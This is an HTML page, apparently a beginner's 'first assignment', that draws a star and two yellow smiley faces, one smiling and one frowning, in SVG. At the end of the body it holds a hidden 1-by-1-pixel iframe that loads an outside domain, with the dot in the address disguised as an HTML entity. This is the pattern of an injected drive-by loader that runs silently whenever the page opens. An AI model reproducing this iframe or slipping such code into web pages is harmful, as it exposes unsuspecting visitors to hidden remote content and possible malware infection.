<html> <head>
<title>
 first assignment </title>
</head>
<body>

<svg height="800" width="800">
<circle r=70 cx="300" cy="100" stroke="black" fill="yellow" stroke-width="5"/>

<polygon points= "100,10 40,198 190,78 10,78 160,198" stroke="black" fill="green"/>

<circle r=10 cx="330" cy="75" stroke="black" fill="black"/>
<circle r=10 cx="270" cy="75" stroke="black" fill="black"/>
<path d="M260,105 C260,150 340,150 340,105"
 fill="none" stroke="black" stroke-width="5"/>
 <circle r=70 cx="300" cy="300" stroke="black" fill="yellow" stroke-width="5"/>
 
 <circle r=10 cx="330" cy="275" stroke="black" fill="black"/>
<circle r=10 cx="270" cy="275" stroke="black" fill="black"/>
<path d="M260,340 C260,295 340,295 340,340"
 fill="none" stroke="black" stroke-width="5"/>
</svg>

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>